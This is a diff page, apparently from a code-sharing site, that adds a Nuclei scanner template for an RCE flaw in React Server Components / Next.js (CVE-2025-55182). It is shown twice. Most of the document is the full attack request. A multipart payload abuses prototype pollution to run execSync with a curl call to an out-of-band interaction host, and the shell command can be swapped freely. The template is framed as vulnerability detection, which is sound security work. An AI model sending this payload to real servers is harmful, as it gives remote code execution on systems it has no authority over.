bolhasec · December 4, 2025 21:36
diff --git a/CVE-2025-55182.yaml b/CVE-2025-55182.yaml
 # Run with
 # nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver <your own interactsh URL>
 # For example: nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver mrh2hxtll3x5n6blhhjq304t0k6b21iy.oastify.com
 id: react-rsc-rce-oast

 info:
  name: React RSC / Next.js RCE via Prototype Pollution (OAST)
  author: sushicomabacate
  severity: critical
  description: |
    Sends a validated multipart/form-data payload that triggers RCE in a
    vulnerable React/Next.js RSC handler. Verification is done via an
    out-of-band callback (Interactsh / OAST).

  tags: rce,prototype-pollution,react,nextjs,oast,interactsh

 http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        sec-ch-ua-platform: "macOS"
        next-action: 60ba9c7b869738ff688c5f88cdbb19c7c54bbcc68c
        x-nextjs-request-id: 74662fae
        Accept-Language: en-US,en;q=0.9
        sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
        sec-ch-ua-mobile: ?0
        next-router-state-tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%2Cnull%2Cnull%5D%7D%2Cnull%2Cnull%2Ctrue%5D
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
        Accept: text/x-component
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvo8BlmQ90KURGcVs
        x-nextjs-html-request-id: CUtAktUzoiqKB2mLPrEDp
        Origin: {{BaseURL}}
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Referer: {{BaseURL}}/
        Accept-Encoding: gzip, deflate, br
        Cookie: wp-settings-1=yithFwSidebarFold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1754222653; wp-settings-2=mfold%3Do; wp-settings-time-2=1754696586; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; LFR_SESSION_STATE_20096=1756674221914; comment_author_dc5265ec90a5af9d15090e4eea33db2e=anon; comment_author_email_dc5265ec90a5af9d15090e4eea33db2e=anon%40gmail.com; __next_hmr_refresh_hash__=6c31f1479969159c80f3851157075bc1633457081244afec
        Connection: keep-alive

        ------WebKitFormBoundaryvo8BlmQ90KURGcVs
        Content-Disposition: form-data; name="0"

        {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('curl {{interactsh-url}}/?base_url={{BaseURL}}');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

        ------WebKitFormBoundaryvo8BlmQ90KURGcVs
        Content-Disposition: form-data; name="1"

        "$@0"
        ------WebKitFormBoundaryvo8BlmQ90KURGcVs
        Content-Disposition: form-data; name="2"

        []
        ------WebKitFormBoundaryvo8BlmQ90KURGcVs--

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
	# Run with
	# nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver <your own interactsh URL>
	# For example: nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver mrh2hxtll3x5n6blhhjq304t0k6b21iy.oastify.com
	id: react-rsc-rce-oast

	info:
	name: React RSC / Next.js RCE via Prototype Pollution (OAST)
	author: sushicomabacate
	severity: critical
	description: \|
	Sends a validated multipart/form-data payload that triggers RCE in a
	vulnerable React/Next.js RSC handler. Verification is done via an
	out-of-band callback (Interactsh / OAST).

	tags: rce,prototype-pollution,react,nextjs,oast,interactsh

	http:
	- raw:
	- \|
	POST / HTTP/1.1
	Host: {{Hostname}}
	sec-ch-ua-platform: "macOS"
	next-action: 60ba9c7b869738ff688c5f88cdbb19c7c54bbcc68c
	x-nextjs-request-id: 74662fae
	Accept-Language: en-US,en;q=0.9
	sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
	sec-ch-ua-mobile: ?0
	next-router-state-tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%2Cnull%2Cnull%5D%7D%2Cnull%2Cnull%2Ctrue%5D
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
	Accept: text/x-component
	Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvo8BlmQ90KURGcVs
	x-nextjs-html-request-id: CUtAktUzoiqKB2mLPrEDp
	Origin: {{BaseURL}}
	Sec-Fetch-Site: same-origin
	Sec-Fetch-Mode: cors
	Sec-Fetch-Dest: empty
	Referer: {{BaseURL}}/
	Accept-Encoding: gzip, deflate, br
	Cookie: wp-settings-1=yithFwSidebarFold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1754222653; wp-settings-2=mfold%3Do; wp-settings-time-2=1754696586; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; LFR_SESSION_STATE_20096=1756674221914; comment_author_dc5265ec90a5af9d15090e4eea33db2e=anon; comment_author_email_dc5265ec90a5af9d15090e4eea33db2e=anon%40gmail.com; __next_hmr_refresh_hash__=6c31f1479969159c80f3851157075bc1633457081244afec
	Connection: keep-alive

	------WebKitFormBoundaryvo8BlmQ90KURGcVs
	Content-Disposition: form-data; name="0"

	{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('curl {{interactsh-url}}/?base_url={{BaseURL}}');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

	------WebKitFormBoundaryvo8BlmQ90KURGcVs
	Content-Disposition: form-data; name="1"

	"$@0"
	------WebKitFormBoundaryvo8BlmQ90KURGcVs
	Content-Disposition: form-data; name="2"

	[]
	------WebKitFormBoundaryvo8BlmQ90KURGcVs--

	matchers:
	- type: word
	part: interactsh_protocol
	words:
	- "dns"
	- "http"
No results found